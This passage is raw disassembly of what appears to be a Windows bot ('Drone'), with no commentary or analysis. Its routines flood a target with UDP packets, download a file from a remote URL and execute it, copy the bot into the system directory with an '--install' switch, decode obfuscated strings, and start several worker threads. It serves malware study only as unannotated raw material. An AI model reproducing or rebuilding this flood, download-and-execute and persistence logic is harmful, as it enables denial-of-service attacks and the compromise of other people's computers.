		push	offset dword_4294DC
		call	sub_417FE1
		add	esp, 14h
		test	esi, esi
		jz	short loc_41C363
		mov	eax, [esi+0Ch]
		mov	eax, [eax]
		jmp	short loc_41C367
; ---------------------------------------------------------------------------

loc_41C363:				; CODE XREF: sub_41C2A3+B7j
		lea	eax, [esp+10h]

loc_41C367:				; CODE XREF: sub_41C2A3+BEj
		mov	eax, [eax]
		push	[esp+0Ch+arg_220]
		mov	edi, ds:dword_41E270
		mov	[esp+10h+arg_8], eax
		call	edi	; htons
		xor	ecx, ecx
		inc	ecx
		cmp	[esp+0Ch+arg_220], ecx
		mov	[esp+0Ch+arg_6], ax
		jge	short loc_41C394
		mov	[esp+0Ch+arg_220], ecx

loc_41C394:				; CODE XREF: sub_41C2A3+E8j
		mov	ebx, 0FFFFh
		cmp	[esp+0Ch+arg_220], ebx
		jle	short loc_41C3A9
		mov	[esp+0Ch+arg_220], ebx

loc_41C3A9:				; CODE XREF: sub_41C2A3+FDj
		mov	eax, [esp+0Ch+arg_21C]
		push	0Ah
		cdq
		pop	esi
		idiv	esi
		xor	esi, esi
		cmp	[esp+0Ch+arg_214], esi
		mov	[esp+0Ch+arg_21C], eax
		jnz	short loc_41C3CF
		mov	[esp+0Ch+arg_214], ecx

loc_41C3CF:				; CODE XREF: sub_41C2A3+123j
		cmp	[esp+0Ch+arg_218], esi
		jle	loc_41C463

loc_41C3DC:				; CODE XREF: sub_41C2A3+155j
		call	sub_4038F1
		cdq
		mov	ecx, 0FFh
		idiv	ecx
		inc	esi
		cmp	esi, [esp+0Ch+arg_218]
		mov	[esp+esi+0Ch+arg_22B], dl
		jl	short loc_41C3DC
		jmp	short loc_41C463
; ---------------------------------------------------------------------------

loc_41C3FC:				; CODE XREF: sub_41C2A3+1C8j
		dec	[esp+0Ch+arg_21C]
		push	0Bh
		pop	esi

loc_41C406:				; CODE XREF: sub_41C2A3+1A1j
		push	10h
		lea	eax, [esp+10h+arg_4]
		push	eax
		push	0
		call	sub_4038F1
		push	0Ah
		cdq
		pop	ecx
		idiv	ecx
		mov	eax, [esp+18h+arg_218]
		sub	eax, edx
		push	eax
		lea	eax, [esp+1Ch+arg_22C]
		push	eax
		push	[esp+20h+arg_0]
		call	ds:dword_41E248	; sendto
		push	[esp+0Ch+arg_214]
		call	ds:off_41E0F8
		dec	esi
		jnz	short loc_41C406
		cmp	[esp+0Ch+arg_220], 1
		jnz	short loc_41C463
		call	sub_4038F1
		cdq
		mov	ecx, ebx
		idiv	ecx
		inc	edx
		push	edx
		call	edi	; htons
		mov	[esp+0Ch+arg_6], ax

loc_41C463:				; CODE XREF: sub_41C2A3+133j
					; sub_41C2A3+157j ...
		cmp	[esp+0Ch+arg_21C], 0
		jg	short loc_41C3FC
		dec	[esp+0Ch+arg_21C]
		lea	eax, [esp+0Ch+arg_114]
		push	eax
		push	offset aUdpFinishedSen ; "UDP: Finished	Sending	UDP Packets to %s"...

loc_41C481:				; CODE XREF: sub_41C2A3+8Aj
		lea	eax, [esp+14h+arg_14]
		push	eax
		push	[esp+18h+arg_224]
		push	offset dword_4294DC
		call	sub_417FE1
		add	esp, 14h
		call	ds:dword_41E0DC	; GetCurrentThreadId
		push	eax
		call	sub_414CA5
		pop	ecx
		mov	ecx, [esp+0Ch+arg_10210]
		pop	edi
		pop	esi
		pop	ebx
		xor	ecx, esp
		xor	eax, eax
		call	sub_402C9E
		mov	esp, ebp
		pop	ebp
		retn	4
sub_41C2A3	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41C4C0	proc near		; DATA XREF: sub_40177B+234o
					; sub_4019F3+1E6o

var_750		= dword	ptr -750h
var_74C		= dword	ptr -74Ch
var_748		= dword	ptr -748h
var_744		= dword	ptr -744h
var_740		= dword	ptr -740h
var_73C		= byte ptr -73Ch
var_738		= byte ptr -738h
var_638		= byte ptr -638h
var_615		= byte ptr -615h
var_515		= byte ptr -515h
var_415		= byte ptr -415h
var_414		= byte ptr -414h
var_413		= dword	ptr -413h
var_408		= byte ptr -408h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		sub	esp, 754h
		mov	eax, dword_424064
		xor	eax, esp
		mov	[esp+754h+var_4], eax
		push	ebx
		push	esi
		mov	esi, [ebp+arg_0]
		push	edi
		mov	ecx, 0C9h
		lea	edi, [esp+760h+var_738]
		rep movsd
		xor	ebx, ebx
		push	ebx
		push	ebx
		push	ebx
		movsw
		push	ebx
		push	offset aMozilla5_0 ; "Mozilla/5.0"
		movsb
		call	ds:dword_41E218	; InternetOpenA
		mov	esi, eax
		lea	eax, [esp+760h+var_515]
		push	eax
		lea	eax, [esp+764h+var_615]
		push	eax
		push	offset aDlDownloadingS ; "DL: Downloading %s to	%s"
		lea	eax, [esp+76Ch+var_738]
		push	eax
		push	[esp+770h+var_413]
		mov	edi, offset dword_4294DC
		push	edi
		call	sub_417FE1
		add	esp, 18h
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		lea	eax, [esp+770h+var_615]
		push	eax
		push	esi
		call	ds:dword_41E214	; InternetOpenUrlA
		cmp	esi, ebx
		mov	[esp+760h+var_744], eax
		jz	loc_41C6DF
		cmp	eax, ebx
		jz	loc_41C6D8
		push	ebx
		push	ebx
		push	2
		push	ebx
		push	ebx
		push	40000000h
		lea	eax, [esp+778h+var_515]
		push	eax
		call	ds:off_41E06C
		mov	[esp+760h+var_748], eax
		call	ds:dword_41E104	; GetTickCount
		mov	[esp+760h+var_740], eax
		mov	[esp+760h+var_750], ebx
		mov	esi, 400h

loc_41C587:				; CODE XREF: sub_41C4C0+11Fj
		push	esi
		lea	eax, [esp+764h+var_408]
		push	ebx
		push	eax
		call	sub_408130
		add	esp, 0Ch
		lea	eax, [esp+760h+var_74C]
		push	eax
		push	esi
		lea	eax, [esp+768h+var_408]
		push	eax
		push	[esp+76Ch+var_744]
		call	ds:dword_41E210	; InternetReadFile
		push	ebx
		lea	eax, [esp+764h+var_73C]
		push	eax
		push	[esp+768h+var_74C]
		lea	eax, [esp+76Ch+var_408]
		push	eax
		push	[esp+770h+var_748]
		call	ds:off_41E088
		test	eax, eax
		jz	loc_41C68A
		mov	eax, [esp+760h+var_74C]
		add	[esp+760h+var_750], eax
		cmp	eax, ebx
		ja	short loc_41C587
		call	ds:dword_41E104	; GetTickCount
		sub	eax, [esp+760h+var_740]
		xor	edx, edx
		mov	ecx, 3E8h
		div	ecx
		mov	ecx, eax
		cmp	ecx, ebx
		jnz	short loc_41C5FD
		xor	ecx, ecx
		inc	ecx

loc_41C5FD:				; CODE XREF: sub_41C4C0+138j
		mov	eax, [esp+760h+var_750]
		xor	edx, edx
		div	ecx
		shr	eax, 0Ah
		push	eax
		push	ecx
		push	[esp+768h+var_750]
		lea	eax, [esp+76Ch+var_515]
		push	eax
		push	offset aDlDownloadSIBy ; "DL: Download %s (%i Bytes) finished in "...
		lea	eax, [esp+774h+var_738]
		push	eax
		push	[esp+778h+var_413]
		push	edi
		call	sub_417FE1
		add	esp, 20h
		push	[esp+760h+var_748]
		call	ds:off_41E0D8
		cmp	[esp+760h+var_415], 1
		jnz	loc_41C6F9
		cmp	[esp+760h+var_414], bl
		lea	eax, [esp+760h+var_515]
		jz	short loc_41C698
		push	eax
		call	sub_419E99
		test	al, al
		pop	ecx
		lea	eax, [esp+760h+var_738]
		jz	short loc_41C691
		push	offset aMainUninstalli ; "Main:	Uninstalling Drone"
		push	eax
		push	[esp+768h+var_413]
		push	edi
		call	sub_417FE1
		add	esp, 10h
		lea	eax, [esp+760h+var_638]
		push	eax
		call	sub_41A0A7

loc_41C68A:				; CODE XREF: sub_41C4C0+10Fj
		push	offset aDlFailedBadLoc ; "DL: Failed; Bad Location."
		jmp	short loc_41C6E4
; ---------------------------------------------------------------------------

loc_41C691:				; CODE XREF: sub_41C4C0+1A5j
		push	offset aDlFailedToUpda ; "DL: Failed To	Update"
		jmp	short loc_41C6E8
; ---------------------------------------------------------------------------

loc_41C698:				; CODE XREF: sub_41C4C0+196j
		push	5
		push	ebx
		push	ebx
		push	eax
		push	offset byte_41FF2F
		push	ebx
		call	ds:dword_41E1E0
		test	eax, eax
		jnz	short loc_41C6B4
		push	offset aDlErrorExecuti ; "DL: Error Executing File."
		jmp	short loc_41C6E4
; ---------------------------------------------------------------------------

loc_41C6B4:				; CODE XREF: sub_41C4C0+1EBj
		lea	eax, [esp+760h+var_515]
		push	eax
		push	offset aDlExecutedFile ; "DL: Executed File: %s"
		lea	eax, [esp+768h+var_738]
		push	eax
		push	[esp+76Ch+var_413]
		push	edi
		call	sub_417FE1
		add	esp, 14h
		jmp	short loc_41C6F9
; ---------------------------------------------------------------------------

loc_41C6D8:				; CODE XREF: sub_41C4C0+91j
		push	offset aDlFailedBadUrl ; "DL: Failed; Bad URL"
		jmp	short loc_41C6E4
; ---------------------------------------------------------------------------

loc_41C6DF:				; CODE XREF: sub_41C4C0+89j
		push	offset aDlFailedWinine ; "DL: Failed; WinINET Error"

loc_41C6E4:				; CODE XREF: sub_41C4C0+1CFj
					; sub_41C4C0+1F2j ...
		lea	eax, [esp+764h+var_738]

loc_41C6E8:				; CODE XREF: sub_41C4C0+1D6j
		push	eax
		push	[esp+768h+var_413]
		push	edi
		call	sub_417FE1
		add	esp, 10h

loc_41C6F9:				; CODE XREF: sub_41C4C0+182j
					; sub_41C4C0+216j
		call	ds:dword_41E0DC	; GetCurrentThreadId
		push	eax
		call	sub_414CA5
		pop	ecx
		mov	ecx, [esp+760h+var_4]
		pop	edi
		pop	esi
		pop	ebx
		xor	ecx, esp
		xor	eax, eax
		call	sub_402C9E
		mov	esp, ebp
		pop	ebp
		retn	4
sub_41C4C0	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41C71F	proc near		; CODE XREF: .text:0041CFF0p
					; .text:0041D00Cp ...

var_108		= dword	ptr -108h
var_104		= byte ptr -104h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 108h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_0]
		push	eax
		lea	eax, [ebp+var_104]
		push	100h
		push	eax
		mov	dword ptr [esi], offset	off_421BF4
		mov	[ebp+var_108], esi
		call	sub_40307C
		mov	eax, dword_437E40
		add	esp, 0Ch
		lea	edx, [ebp+var_108]
		push	edx
		mov	ecx, offset dword_437E3C
		push	eax
		push	ecx
		call	sub_40121E
		mov	ecx, [ebp+var_4]
		xor	ecx, ebp
		mov	eax, esi
		call	sub_402C9E
		leave
		retn	4
sub_41C71F	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41C77E	proc near		; CODE XREF: .text:00404674p

var_728		= dword	ptr -728h
var_724		= dword	ptr -724h
var_720		= byte ptr -720h
var_718		= dword	ptr -718h
var_714		= dword	ptr -714h
var_680		= byte ptr -680h
var_4EC		= byte ptr -4ECh
var_4E0		= byte ptr -4E0h
var_4DF		= byte ptr -4DFh
var_4A8		= byte ptr -4A8h
var_4A7		= byte ptr -4A7h
var_428		= byte ptr -428h
var_427		= byte ptr -427h
var_320		= byte ptr -320h
var_31F		= byte ptr -31Fh
var_218		= byte ptr -218h
var_217		= byte ptr -217h
var_110		= byte ptr -110h
var_10F		= byte ptr -10Fh
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		sub	esp, 72Ch
		mov	eax, dword_424064
		xor	eax, esp
		mov	[esp+72Ch+var_4], eax
		mov	eax, [ebp+arg_8]
		push	ebx
		push	esi
		push	edi
		mov	[esp+738h+var_728], eax
		call	sub_41A2A7
		test	al, al
		jnz	loc_41CBE5
		call	sub_41A21C
		test	al, al
		jnz	short loc_41C7BE
		call	ds:off_41E08C

loc_41C7BE:				; CODE XREF: sub_41C77E+38j
		mov	esi, offset aInstall ; "--install "
		lea	edi, [esp+738h+var_4EC]
		movsd
		movsd
		movsw
		movsb
		mov	edi, 103h
		xor	ebx, ebx
		push	edi
		lea	eax, [esp+73Ch+var_10F]
		push	ebx
		push	eax
		mov	[esp+744h+var_110], bl
		call	sub_408130
		add	esp, 0Ch
		push	edi
		lea	eax, [esp+73Ch+var_31F]
		push	ebx
		push	eax
		mov	[esp+744h+var_320], bl
		call	sub_408130
		add	esp, 0Ch
		push	edi
		lea	eax, [esp+73Ch+var_427]
		push	ebx
		push	eax
		mov	[esp+744h+var_428], bl
		call	sub_408130
		add	esp, 0Ch
		push	7Fh
		lea	eax, [esp+73Ch+var_4A7]
		push	ebx
		push	eax
		mov	[esp+744h+var_4A8], bl
		call	sub_408130
		add	esp, 0Ch
		push	edi
		lea	eax, [esp+73Ch+var_110]
		push	eax
		call	ds:dword_41E0F0	; GetSystemDirectoryA
		push	80h
		lea	esi, [esp+73Ch+var_4A8]
		mov	ebx, offset aVqdD ; "²»²·¢ï¤¹¤"
		call	sub_41A301
		pop	ecx
		mov	eax, esi
		push	eax
		lea	eax, [esp+73Ch+var_110]
		push	eax
		push	offset aSS_6	; "%s\\%s"
		lea	eax, [esp+744h+var_428]
		push	edi
		push	eax
		call	sub_40307C
		lea	eax, [esp+74Ch+var_428]
		add	esp, 14h
		lea	ecx, [eax+1]

loc_41C88C:				; CODE XREF: sub_41C77E+113j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_41C88C
		sub	eax, ecx
		xor	ebx, ebx
		mov	[esp+eax+738h+var_428],	bl
		mov	esi, 104h
		push	esi
		lea	eax, [esp+73Ch+var_320]
		push	eax
		push	ebx
		call	ds:dword_41E0E0	; GetModuleHandleA
		push	eax
		call	ds:dword_41E060	; GetModuleFileNameA
		lea	eax, [esp+738h+var_4EC]
		lea	ecx, [eax+1]

loc_41C8C4:				; CODE XREF: sub_41C77E+14Bj
		mov	dl, [eax]
		inc	eax
		cmp	dl, bl
		jnz	short loc_41C8C4
		sub	eax, ecx
		push	eax
		lea	eax, [esp+73Ch+var_4EC]
		push	eax
		push	[esp+740h+var_728]
		call	sub_402F77
		add	esp, 0Ch
		test	eax, eax
		jz	short loc_41C94C
		push	esi
		lea	eax, [esp+73Ch+var_428]
		push	eax
		lea	eax, [esp+740h+var_320]
		push	eax
		call	sub_402F77
		add	esp, 0Ch
		test	eax, eax
		jz	short loc_41C94C
		push	ebx
		lea	eax, [esp+73Ch+var_428]
		push	eax
		lea	eax, [esp+740h+var_320]
		push	eax
		call	ds:dword_41E080	; CopyFileA
		test	eax, eax
		jz	loc_41CBE5
		lea	eax, [esp+738h+var_320]
		push	eax
		lea	eax, [esp+73Ch+var_4EC]
		push	eax
		lea	eax, [esp+740h+var_428]
		push	eax
		push	offset aSSS_0	; "%s %s%s"
		call	sub_419E99
		add	esp, 10h
		jmp	loc_41CBE5
; ---------------------------------------------------------------------------

loc_41C94C:				; CODE XREF: sub_41C77E+166j
					; sub_41C77E+183j
		lea	eax, [esp+738h+var_4EC]
		lea	edx, [eax+1]

loc_41C956:				; CODE XREF: sub_41C77E+1DDj
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_41C956
		sub	eax, edx
		push	eax
		lea	eax, [esp+73Ch+var_4EC]
		push	eax
		push	[esp+740h+var_728]
		call	sub_402F77
		add	esp, 0Ch
		test	eax, eax
		jnz	loc_41CA07
		push	esi
		lea	eax, [esp+73Ch+var_428]
		push	eax
		lea	eax, [esp+740h+var_320]
		push	eax
		call	sub_402F77
		add	esp, 0Ch
		test	eax, eax
		jnz	short loc_41CA07
		push	edi
		lea	eax, [esp+73Ch+var_217]
		push	ebx
		push	eax
		mov	[esp+744h+var_218], bl
		call	sub_408130
		lea	eax, [esp+744h+var_4EC]
		add	esp, 0Ch
		lea	edi, [eax+1]

loc_41C9BC:				; CODE XREF: sub_41C77E+243j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_41C9BC
		mov	ecx, [esp+738h+var_728]
		sub	eax, edi
		add	eax, ecx
		push	eax
		push	offset aS_12	; "%s"
		lea	eax, [esp+740h+var_218]
		push	esi
		push	eax
		call	sub_40307C
		add	esp, 10h
		xor	esi, esi

loc_41C9E4:				; CODE XREF: sub_41C77E+287j
		lea	eax, [esp+738h+var_218]
		push	eax
		call	ds:off_41E0CC
		test	eax, eax
		jnz	short loc_41CA07
		push	0C8h
		call	ds:off_41E0F8
		inc	esi
		cmp	esi, 3
		jb	short loc_41C9E4

loc_41CA07:				; CODE XREF: sub_41C77E+1F8j
					; sub_41C77E+219j ...
		push	80h
		lea	eax, [esp+73Ch+var_4A8]
		push	ebx
		push	eax
		call	sub_408130
		add	esp, 0Ch
		push	37h
		lea	eax, [esp+73Ch+var_4DF]
		push	ebx
		push	eax
		mov	[esp+744h+var_4E0], bl
		call	sub_408130
		add	esp, 0Ch
		push	38h
		lea	esi, [esp+73Ch+var_4E0]
		mov	ebx, offset aZfvksoftsmapxd ; "‡”‚Š˜Ž”’˜Œ€•„‚"
		call	sub_41A301
		pop	ecx
		mov	eax, esi
		push	eax
		push	1
		xor	ebx, ebx
		push	ebx
		call	ds:off_41E084
		push	38h
		mov	esi, eax
		lea	eax, [esp+73Ch+var_4E0]
		push	ebx
		push	eax
		call	sub_408130
		add	esp, 0Ch
		push	1388h
		push	esi
		call	ds:off_41E07C
		cmp	eax, 102h
		jnz	short loc_41CA88
		push	ebx
		call	ds:off_41E050

loc_41CA88:				; CODE XREF: sub_41C77E+301j
		call	sub_417C06
		push	8
		call	sub_4035D9
		cmp	eax, ebx
		pop	ecx
		jz	short loc_41CAAC
		push	offset sub_417D99
		xor	ecx, ecx
		mov	edi, offset aRm	; "RM"
		mov	esi, eax
		call	sub_414D0E

loc_41CAAC:				; CODE XREF: sub_41C77E+319j
		lea	eax, [esp+738h+var_718]
		push	eax
		mov	[esp+73Ch+var_718], 94h
		call	ds:dword_41E068	; GetVersionExA
		cmp	[esp+738h+var_714], 4
		jz	short loc_41CAE5
		push	8
		call	sub_4035D9
		cmp	eax, ebx
		pop	ecx
		jz	short loc_41CAE5
		push	offset sub_41AAD0
		xor	ecx, ecx
		mov	edi, offset aBk	; "BK"
		mov	esi, eax
		call	sub_414D0E

loc_41CAE5:				; CODE XREF: sub_41C77E+346j
					; sub_41C77E+352j
		push	8
		mov	byte_4294E0, bl
		call	sub_4035D9
		cmp	eax, ebx
		pop	ecx
		jz	short loc_41CB0A
		push	offset sub_418F81
		xor	ecx, ecx
		mov	edi, offset aUnm ; "UNM"
		mov	esi, eax
		call	sub_414D0E

loc_41CB0A:				; CODE XREF: sub_41C77E+377j
		lea	eax, [esp+738h+var_680]
		push	eax
		push	202h
		call	ds:dword_41E274	; WSAStartup
		test	eax, eax
		jnz	loc_41CBDF
		call	sub_419F7B
		mov	byte_437B3D, bl
		call	sub_41C0F3
		mov	eax, [ebp+arg_0]
		mov	byte_4293D4, bl
		mov	dword_4291C4, eax
		call	sub_419997
		mov	eax, dword_437E40
		mov	eax, [eax]
		mov	ebx, offset dword_437E3C
		mov	[esp+738h+var_724], eax
		mov	[esp+738h+var_728], ebx

loc_41CB5C:				; CODE XREF: sub_41C77E+409j
		cmp	[esp+738h+var_728], 0
		mov	esi, dword_437E40
		jz	short loc_41CB6F
		cmp	[esp+738h+var_728], ebx
		jz	short loc_41CB74

loc_41CB6F:				; CODE XREF: sub_41C77E+3E9j
		call	sub_4034EB

loc_41CB74:				; CODE XREF: sub_41C77E+3EFj
		cmp	[esp+738h+var_724], esi
		jz	short loc_41CB89
		lea	edi, [esp+738h+var_720]
		lea	esi, [esp+738h+var_728]
		call	sub_40166F
		jmp	short loc_41CB5C
; ---------------------------------------------------------------------------

loc_41CB89:				; CODE XREF: sub_41C77E+3FAj
		mov	edi, offset dword_4294DC

loc_41CB8E:				; CODE XREF: sub_41C77E+45Fj
		push	3
		mov	esi, offset dword_426E30
		pop	ebx

loc_41CB96:				; CODE XREF: sub_41C77E+45Dj
		movsx	eax, word ptr [esi+200h]
		push	eax
		push	esi
		lea	edx, [esi-200h]
		mov	ecx, edi
		call	sub_418CAF
		test	al, al
		jz	short loc_41CBC2
		mov	byte_4294E0, 1

loc_41CBB7:				; CODE XREF: sub_41C77E+442j
		mov	ecx, edi
		call	sub_418B81
		test	al, al
		jnz	short loc_41CBB7

loc_41CBC2:				; CODE XREF: sub_41C77E+430j
		push	3A98h
		mov	byte_4294E0, 0
		call	ds:off_41E0F8
		add	esi, 402h
		dec	ebx
		jnz	short loc_41CB96
		jmp	short loc_41CB8E
; ---------------------------------------------------------------------------

loc_41CBDF:				; CODE XREF: sub_41C77E+3A1j
		call	ds:dword_41E240	; WSACleanup

loc_41CBE5:				; CODE XREF: sub_41C77E+2Bj
					; sub_41C77E+19Ej ...
		mov	ecx, [esp+738h+var_4]
		pop	edi
		pop	esi
		pop	ebx
		xor	ecx, esp
		xor	eax, eax
		call	sub_402C9E
		mov	esp, ebp
		pop	ebp
		retn	10h
sub_41C77E	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_41CC00	proc near		; CODE XREF: sub_419A20+2Fp
					; sub_419A20+6Cp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h

		push	edi
		push	esi
		push	ebx
		xor	edi, edi
		mov	eax, [esp+0Ch+arg_4]
		or	eax, eax
		jge	short loc_41CC21
		inc	edi
		mov	edx, [esp+0Ch+arg_0]
		neg	eax
		neg	edx
		sbb	eax, 0
		mov	[esp+0Ch+arg_4], eax
		mov	[esp+0Ch+arg_0], edx

loc_41CC21:				; CODE XREF: sub_41CC00+Bj
		mov	eax, [esp+0Ch+arg_C]
		or	eax, eax
		jge	short loc_41CC3D
		inc	edi
		mov	edx, [esp+0Ch+arg_8]
		neg	eax
		neg	edx
		sbb	eax, 0
		mov	[esp+0Ch+arg_C], eax
		mov	[esp+0Ch+arg_8], edx

loc_41CC3D:				; CODE XREF: sub_41CC00+27j
		or	eax, eax
		jnz	short loc_41CC59
		mov	ecx, [esp+0Ch+arg_8]
		mov	eax, [esp+0Ch+arg_4]
		xor	edx, edx
		div	ecx
		mov	ebx, eax
		mov	eax, [esp+0Ch+arg_0]
		div	ecx
		mov	edx, ebx
		jmp	short loc_41CC9A
; ---------------------------------------------------------------------------

loc_41CC59:				; CODE XREF: sub_41CC00+3Fj
		mov	ebx, eax
		mov	ecx, [esp+0Ch+arg_8]
		mov	edx, [esp+0Ch+arg_4]
		mov	eax, [esp+0Ch+arg_0]

loc_41CC67:				; CODE XREF: sub_41CC00+71j
		shr	ebx, 1
		rcr	ecx, 1
		shr	edx, 1
		rcr	eax, 1
		or	ebx, ebx
		jnz	short loc_41CC67
		div	ecx
		mov	esi, eax
		mul	[esp+0Ch+arg_C]
		mov	ecx, eax
		mov	eax, [esp+0Ch+arg_8]
		mul	esi
		add	edx, ecx
		jb	short loc_41CC95
		cmp	edx, [esp+0Ch+arg_4]
		ja	short loc_41CC95
		jb	short loc_41CC96
		cmp	eax, [esp+0Ch+arg_0]
		jbe	short loc_41CC96

loc_41CC95:				; CODE XREF: sub_41CC00+85j
					; sub_41CC00+8Bj
		dec	esi

loc_41CC96:				; CODE XREF: sub_41CC00+8Dj
					; sub_41CC00+93j
		xor	edx, edx
		mov	eax, esi

loc_41CC9A:				; CODE XREF: sub_41CC00+57j
		dec	edi
		jnz	short loc_41CCA4
		neg	edx
		neg	eax
		sbb	edx, 0

loc_41CCA4:				; CODE XREF: sub_41CC00+9Bj
		pop	ebx
		pop	esi
		pop	edi
		retn	10h
sub_41CC00	endp

; ---------------------------------------------------------------------------
		align 10h
		cmp	dword_437E9C, 0
		jz	short sub_41CCE6

loc_41CCB9:				; CODE XREF: .text:0041CCE4j
		push	ebp
		mov	ebp, esp
		sub	esp, 8
		and	esp, 0FFFFFFF8h
		fstp	qword ptr [esp]
		cvttsd2si eax, qword ptr [esp]
		leave
		retn
; ---------------------------------------------------------------------------
		cmp	dword_437E9C, 0
		jz	short sub_41CCE6
		sub	esp, 4
		fnstcw	word ptr [esp]
		pop	eax
		and	ax, 7Fh
		cmp	ax, 7Fh
		jz	short loc_41CCB9

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41CCE6	proc near		; CODE XREF: sub_41B3E7+520p
					; .text:0041CCB7j ...

var_20		= dword	ptr -20h
var_10		= qword	ptr -10h
var_8		= dword	ptr -8

		push	ebp
		mov	ebp, esp
		sub	esp, 20h
		and	esp, 0FFFFFFF0h
		fld	st
		fst	[esp+20h+var_8]
		fistp	[esp+20h+var_10]
		fild	[esp+20h+var_10]
		mov	edx, [esp+20h+var_8]
		mov	eax, dword ptr [esp+20h+var_10]
		test	eax, eax
		jz	short loc_41CD45

loc_41CD09:				; CODE XREF: sub_41CCE6+69j
		fsubp	st(1), st
		test	edx, edx
		jns	short loc_41CD2D
		fstp	[esp+20h+var_20]
		mov	ecx, [esp+20h+var_20]
		xor	ecx, 80000000h
		add	ecx, 7FFFFFFFh
		adc	eax, 0
		mov	edx, dword ptr [esp+20h+var_10+4]
		adc	edx, 0
		jmp	short locret_41CD59
; ---------------------------------------------------------------------------

loc_41CD2D:				; CODE XREF: sub_41CCE6+27j
		fstp	[esp+20h+var_20]
		mov	ecx, [esp+20h+var_20]
		add	ecx, 7FFFFFFFh
		sbb	eax, 0
		mov	edx, dword ptr [esp+20h+var_10+4]
		sbb	edx, 0
		jmp	short locret_41CD59
; ---------------------------------------------------------------------------

loc_41CD45:				; CODE XREF: sub_41CCE6+21j
		mov	edx, dword ptr [esp+20h+var_10+4]
		test	edx, 7FFFFFFFh
		jnz	short loc_41CD09
		fstp	[esp+20h+var_8]
		fstp	[esp+20h+var_8]

locret_41CD59:				; CODE XREF: sub_41CCE6+45j
					; sub_41CCE6+5Dj
		leave
		retn
sub_41CCE6	endp

; ---------------------------------------------------------------------------
		lea	ecx, [ebp-28h]
		jmp	loc_401137
; ---------------------------------------------------------------------------

loc_41CD63:				; DATA XREF: sub_402C08+2o
					; sub_402C47+2o
		mov	edx, [esp+8]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-54h]
		xor	ecx, eax
		call	sub_402C9E
		mov	eax, offset dword_422808
		jmp	sub_40484E
; ---------------------------------------------------------------------------

loc_41CD7E:				; DATA XREF: sub_40BA74+2o
		mov	edx, [esp+8]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-14h]
		xor	ecx, eax
		call	sub_402C9E
		mov	eax, offset dword_422BA8
		jmp	sub_40484E

; =============== S U B	R O U T	I N E =======================================



sub_41CD99	proc near		; CODE XREF: sub_408622+14p
					; DATA XREF: sub_401442+2o

arg_4		= dword	ptr  8

		mov	edx, [esp+arg_4]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-1Ch]
		xor	ecx, eax
		call	sub_402C9E
		mov	eax, offset dword_423038
		jmp	sub_40484E
sub_41CD99	endp

; ---------------------------------------------------------------------------
		mov	ecx, [ebp-10h]
		jmp	sub_403258
; ---------------------------------------------------------------------------

loc_41CDBC:				; DATA XREF: sub_401065+2o
					; sub_4013E6+2o
		mov	edx, [esp+8]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-14h]
		xor	ecx, eax
		call	sub_402C9E
		mov	eax, offset dword_423068
		jmp	sub_40484E
; ---------------------------------------------------------------------------
		lea	ecx, [ebp-2Ch]
		jmp	loc_401137
; ---------------------------------------------------------------------------

loc_41CDDF:				; DATA XREF: sub_4016BA+2o
		mov	edx, [esp+8]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-58h]
		xor	ecx, eax
		call	sub_402C9E
		mov	eax, offset dword_423098
		jmp	sub_40484E
; ---------------------------------------------------------------------------
		push	dword ptr [ebp-10h]
		call	sub_4034FB
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_41CE04:				; DATA XREF: sub_41C0F3+2o
		mov	edx, [esp+8]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-14h]
		xor	ecx, eax
		call	sub_402C9E
		mov	eax, offset dword_422F50
		jmp	sub_40484E
; ---------------------------------------------------------------------------
		push	dword ptr [ebp-10h]
		call	sub_4034FB
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_41CE29:				; DATA XREF: sub_419997+2o
		mov	edx, [esp+8]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-14h]
		xor	ecx, eax
		call	sub_402C9E
		mov	eax, offset dword_422F7C
		jmp	sub_40484E
; ---------------------------------------------------------------------------
		push	dword ptr [ebp-154h]
		call	sub_4034FB
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_41CE51:				; DATA XREF: sub_4147B2+8o
		mov	edx, [esp+8]
		lea	eax, [edx-154h]
		mov	ecx, [edx-158h]
		xor	ecx, eax
		call	sub_402C9E
		add	eax, 8
		mov	ecx, [edx-8]
		xor	ecx, eax
		call	sub_402C9E
		mov	eax, offset dword_422FA8
		jmp	sub_40484E
; ---------------------------------------------------------------------------
		lea	ecx, [ebp-28h]
		jmp	loc_401137
; ---------------------------------------------------------------------------

loc_41CE87:				; DATA XREF: sub_40121E+2o
		mov	edx, [esp+8]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-54h]
		xor	ecx, eax
		call	sub_402C9E
		mov	eax, offset dword_4230C8
		jmp	sub_40484E
; ---------------------------------------------------------------------------
		push	dword ptr [ebp-58h]
		call	sub_4034FB
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_41CEAC:				; DATA XREF: sub_4024A4+2o
		mov	edx, [esp+8]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-70h]
